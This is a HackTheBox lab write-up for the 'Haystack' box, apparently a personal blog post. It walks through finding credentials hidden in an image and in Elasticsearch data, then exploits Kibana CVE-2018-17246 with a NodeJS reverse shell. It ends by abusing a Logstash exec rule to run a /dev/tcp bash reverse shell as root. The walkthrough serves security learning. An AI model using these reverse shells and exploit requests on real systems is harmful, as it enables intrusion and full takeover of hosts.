HackTheBox - Haystack


Haystack is a very interesting box for learning more about the ELK (Elasticsearch, Logstash, Kibana) stack, which is becoming very popular. The user part is very CTF-like, while the root part is a more realistic scenario.

First things first, let's add the box IP to the hosts file:

[hg8@archbook ~]$ echo '10.10.10.115 haystack.htb' >> /etc/hosts

User Flag

Recon

Let’s start with the classic nmap scan:

[hg8@archbook ~]$ nmap -sV -sT -sC 10.10.10.115
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-29 22:08 CEST
Nmap scan report for haystack.htb (10.10.10.115)
Host is up (0.75s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    nginx 1.12.2
9200/tcp open  http    nginx 1.12.2

Nmap done: 1 IP address (1 host up) scanned in 87.23 seconds

Alright, nothing surprising here: SSH, HTTP, and port 9200, which is used by Elasticsearch. Let's start.

Steganography

Opening http://haystack.htb, we are greeted with a single image.

<html><body><img src="needle.jpg" /></body></html>

gobuster doesn't find anything else interesting, so let's check this image:

[hg8@archbook ~]$ wget haystack.htb/needle.jpg
[hg8@archbook ~]$ file needle.jpg
needle.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=paint.net 4.1.1], baseline, precision 8, 1200x803, components 3

So far so good, nothing suspicious. Let's see if we can find any strings in it:

[hg8@archbook ~]$ strings needle.jpg
[...]
bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==

Let's decode this base64 string:

[hg8@archbook ~]$ echo "bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==" | base64 -d
la aguja en el pajar es "clave"

A hint. Let's keep clave in mind (Spanish for "key"). There seems to be nothing else to find on the HTTP service, so let's move on to the Elasticsearch instance.
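Eyeballing strings output works on a small image, but hunting for embedded base64 can also be automated. A minimal Python sketch; find_base64 and the 20-character threshold are my own illustrative choices, and blob stands in for the raw bytes of needle.jpg:

```python
import base64
import re

def find_base64(data: bytes, min_len: int = 20):
    """Yield the decoded payload of every base64-looking run in a blob."""
    for match in re.finditer(rb"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, data):
        try:
            yield base64.b64decode(match.group(), validate=True)
        except ValueError:
            # Long alphanumeric run that is not valid base64; skip it.
            continue

# Stand-in for open("needle.jpg", "rb").read()
blob = b"...binary noise...bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==...noise..."
for payload in find_base64(blob):
    print(payload.decode(errors="replace"))  # → la aguja en el pajar es "clave"
```

The minimum-length filter is just there to skip the short alphanumeric runs that any binary file is full of.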

Elasticsearch

Opening port 9200 returns the following JSON:

[hg8@archbook ~]$ http haystack.htb:9200
HTTP/1.1 200 OK

{
  "cluster_name": "elasticsearch",
  "cluster_uuid": "pjrX7V_gSFmJY-DxP4tCQg",
  "name": "iQEYHgS",
  "tagline": "You Know, for Search",
  "version": {
    "build_date": "2018-09-26T13:34:09.098244Z",
    "build_flavor": "default",
    "build_hash": "04711c2",
    "build_snapshot": false,
    "build_type": "rpm",
    "lucene_version": "7.4.0",
    "minimum_index_compatibility_version": "5.0.0",
    "minimum_wire_compatibility_version": "5.6.0",
    "number": "6.4.2"
  }
}

It's a classic Elastic cluster, running version 6.4.2 (not the most recent one).

We can use the _cat endpoint to list all indices:

[hg8@archbook ~]$ http "haystack.htb:9200/_cat/indices"
HTTP/1.1 200 OK

.kibana 6tjAYZrgQ5CwwR0g6VOoRg 1 0    2 0  14.3kb  14.3kb
quotes  ZG2D1IqkQNiNZmi2HRImnQ 5 1  253 0 262.7kb 262.7kb
bank    eSVpNfCfREyYoVigNWcrMw 5 1 1000 0 483.2kb 483.2kb

So we have bank with 1000 documents and quotes with 253. Let's search across those documents to see if we can find something interesting, keeping our previous hint in mind.

According to the documentation, we can use the _search endpoint to search across all documents. Searching for the keyword key doesn't return any interesting user or information. Let's try the clave keyword we found in the image:

[hg8@archbook ~]$ http "haystack.htb:9200/_search?q=clave"
HTTP/1.1 200 OK


{
  "_shards": {
    "failed": 0,
    "skipped": 0,
    "successful": 11,
    "total": 11
  },
  "hits": {
    "hits": [
      {
        "_id": "45",
        "_index": "quotes",
        "_score": 5.9335938,
        "_source": {
          "quote": "Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "
        },
        "_type": "quote"
      },
      {
        "_id": "111",
        "_index": "quotes",
        "_score": 5.3459888,
        "_source": {
          "quote": "Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="
        },
        "_type": "quote"
      }
    ],
    "max_score": 5.9335938,
    "total": 2
  },
  "timed_out": false,
  "took": 25
}

Neat, that sounds promising. Let's decode:

[hg8@archbook ~]$ echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d
user: security

[hg8@archbook ~]$ echo 'cGFzczogc3BhbmlzaC5pcy5rZXk=' | base64 -d
pass: spanish.is.key
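With only two hits the manual decode above is fine, but the same extraction can be scripted against the _search JSON. A sketch assuming the hit layout shown above; the response is inlined here rather than fetched from the box, and the 8-character token threshold is an arbitrary choice:

```python
import base64
import json
import re

# Trimmed copy of the _search response shown above.
response = json.loads("""
{"hits": {"hits": [
  {"_index": "quotes", "_id": "45",
   "_source": {"quote": "Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}},
  {"_index": "quotes", "_id": "111",
   "_source": {"quote": "Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}
]}}
""")

secrets = []
for hit in response["hits"]["hits"]:
    quote = hit["_source"]["quote"]
    # Grab the base64-looking tokens of each quote and decode them.
    for token in re.findall(r"[A-Za-z0-9+/]{8,}={0,2}", quote):
        secrets.append(base64.b64decode(token).decode())

print(secrets)  # → ['user: security ', 'pass: spanish.is.key']
```

Note the trailing space in the decoded username line; the base64 in the quote really does encode "security " with a space.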

A username and a password, couldn't ask for anything better! Could these be SSH credentials?

[hg8@archbook ~]$ ssh security@haystack.htb
security@haystack.htb's password:
Last login: Thu Aug 29 16:24:15 2019 from 10.10.10.85
[security@haystack ~]$
[security@haystack ~]$ cat user.txt
04d1xxxxxxxxxxxxxxx8eb929

First step done. Time for root.

Root flag

Now that we have user, let's try to escalate privileges. Privilege-escalation enumeration scripts output nothing really interesting, so let's focus on the ELK stack again, which seems to be the core of this box.

Pivot security -> kibana user

Kibana and Logstash are installed, but their configuration files are inaccessible to the security user:

[security@haystack conf.d]$ cat /etc/passwd
[...]
security:x:1000:1000:security:/home/security:/bin/bash
elasticsearch:x:997:995:elasticsearch user:/nonexistent:/sbin/nologin
logstash:x:996:994:logstash:/usr/share/logstash:/sbin/nologin
kibana:x:994:992:kibana service user:/home/kibana:/sbin/nologin

[security@haystack conf.d]$ cd /opt/kibana/
-bash: cd: /opt/kibana/: Permiso denegado

[security@haystack conf.d]$ cat /etc/logstash/conf.d/filter.conf
cat: /etc/logstash/conf.d/filter.conf: Permiso denegado

Seems like we will need to pivot to the kibana or logstash user to make progress.

For now we don't have any information about either Kibana or Logstash. Let's check Elasticsearch again:

[hg8@archbook ~]$ http haystack.htb:9200
HTTP/1.1 200 OK

{
  "cluster_name": "elasticsearch",
  "cluster_uuid": "pjrX7V_gSFmJY-DxP4tCQg",
  "name": "iQEYHgS",
  "tagline": "You Know, for Search",
  "version": {
    "build_date": "2018-09-26T13:34:09.098244Z",
    "build_flavor": "default",
    "build_hash": "04711c2",
    "build_snapshot": false,
    "build_type": "rpm",
    "lucene_version": "7.4.0",
    "minimum_index_compatibility_version": "5.0.0",
    "minimum_wire_compatibility_version": "5.6.0",
    "number": "6.4.2"
  }
}

Elasticsearch is at version 6.4.2, with a build date of September 2018. That's quite old.

And indeed, after a bit of Google-fu we stumble upon CVE-2018-17246:

Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.

More information is available on the CyberArk website, which gives an example of how to run this exploit.
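The long ../ chain in the exploit URL simply climbs to the filesystem root; any extra segments are clamped there, so the exact depth doesn't matter as long as there are enough of them. A quick sanity check of the resolved path (the Kibana base directory here is a guess for illustration, not the real resolution point):

```python
import posixpath

# Hypothetical directory the Console plugin resolves the 'apis' parameter against.
base = "/usr/share/kibana/src/core_plugins/console/api_server"
payload = "../../../../../../../../../../../tmp/hg8.js"

# normpath collapses the ../ segments; those that go past "/" are ignored.
print(posixpath.normpath(posixpath.join(base, payload)))  # → /tmp/hg8.js
```

This is why "enough ../ to be safe" is the usual approach in path-traversal payloads.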

First we need to write a NodeJS reverse shell (I used the one found here) to the file /tmp/hg8.js:

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8585, "10.10.10.10", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})();

Start a netcat listener for the reverse shell:

nc -l -vv -p 8585
Listening on any address 8585

Let's now launch the exploit against the local Kibana instance.
According to the documentation, Kibana runs on port 5601:

The default settings configure Kibana to run on localhost:5601.

We now have all the information we need, so let's launch our exploit:

curl "http://localhost:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../../../../../../tmp/hg8.js"

On our netcat listener the connection appears:

[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585
Connection from 10.10.10.10:53792
id
uid=994(kibana) gid=992(kibana) grupos=992(kibana) contexto=system_u:system_r:unconfined_service_t:s0

Good, we now have a shell as the kibana user.

Let's upgrade our shell to a fully interactive one to make life easier (check out this blog post for more information):

$ python -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm-256color
$ export SHELL=/bin/bash
$ # CTRL + Z
$ stty raw -echo;fg
reset
$

Logstash -> root

Looking around shows that /opt/kibana/ turns out to be empty, and /etc/elasticsearch/ still can't be accessed.

/etc/logstash/ belongs to the kibana group, so we can read its contents. Let's dig in.

As a reminder, Logstash is a tool that collects various logs, parses them, and writes the parsed data to an Elasticsearch cluster:

Logstash (part of the Elastic Stack) integrates data from any source, in any format with this flexible, open source collection, parsing, and enrichment pipeline.
https://www.elastic.co/fr/products/logstash

Reading the startup.options file, one piece of information catches the eye:

$ cat /etc/logstash/startup.options
# user and group id to be invoked as
#LS_USER=logstash
#LS_GROUP=logstash
LS_USER=root
LS_GROUP=root

So Logstash will run not as the logstash user but as root. We are on the right track.
The conf.d folder contains three files. Based on their contents, here is what each one does:

  • input.conf tells Logstash where to look for logs.
  • filter.conf filters which data is processed and which is ignored.
  • output.conf defines what to do with the parsed data.

Let's look first at input.conf and output.conf:

$ cat input.conf
input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"
  }
}

$ cat output.conf
output {
  if [type] == "execute" {
    stdout { codec => json }
    exec {
      command => "%{comando} &"
    }
  }
}

According to this config, every 10 seconds Logstash will:

  1. Check for files named logstash_* in the /opt/kibana/ folder:

    path => "/opt/kibana/logstash_*"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"

  2. Check the file contents for data matching the filter (a regex) defined in filter.conf.

  3. Send the matched data to be executed in the background:

    exec {
      command => "%{comando} &"
    }

Good: it seems we can write any command to a file named /opt/kibana/logstash_* and it will be run as root. Neat.
But first we have to make sure the command matches the filter so that Logstash parses it correctly.

Let's understand that filter:

$ cat filter.conf
filter {
  if [type] == "execute" {
    grok {
      match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
    }
  }
}

That syntax looks complicated at first. The Logstash documentation presents grok as:

Grok is a great way to parse unstructured log data into something structured and queryable.

So it's a kind of regex. Let's break it down step by step:

Ejecutar\s*comando\s*:\s+ is a plain regex, meaning the line has to begin with this sentence ("Execute command:" in Spanish).
%{GREEDYDATA:comando} is the interesting grok part. According to the grok pattern source, GREEDYDATA corresponds to .* in regex.

So basically, given the line Ejecutar comando : id, grok will match it, capture the id part into the comando variable, and pass it to the Logstash output (command => "%{comando} &", as seen in output.conf).
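Since GREEDYDATA is just .*, the whole grok expression can be mimicked with a plain Python regex to check which payload lines Logstash would actually match:

```python
import re

# Python equivalent of the grok pattern from filter.conf
# (GREEDYDATA expands to .*, captured here as the "comando" group).
pattern = re.compile(r"Ejecutar\s*comando\s*:\s+(?P<comando>.*)")

for line in ["Ejecutar comando : id", "id"]:
    match = pattern.search(line)
    print(match.group("comando") if match else "no match")
# → id
# → no match
```

The second line shows why a bare command in the file would do nothing: without the Ejecutar comando : prefix, grok never populates comando and the exec output has nothing to run.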

Let's put all this information together and try to get a root shell.

First, as usual, let's open a netcat listener:

nc -l -vv -p 4485
Listening on any address 4485 (assyst-dr)

Then create the input file Logstash is watching for (/opt/kibana/logstash_*), with content matching the filter in filter.conf:

echo "Ejecutar comando : bash -i >& /dev/tcp/10.10.10.10/4485 0>&1" > /opt/kibana/logstash_hg8

We then wait a bit, and fairly quickly we get an incoming connection as root:

nc -l -vv -p 4485
Listening on any address 4485 (assyst-dr)
Connection from 10.10.10.115:49446
bash: no hay control de trabajos en este shell
[root@haystack /]# cat /root/root.txt
3f5f727xxxxxxxxxxxx9d92
[root@haystack /]#

As always, do not hesitate to contact me with any questions or feedback ;)

See you next time !

-hg8


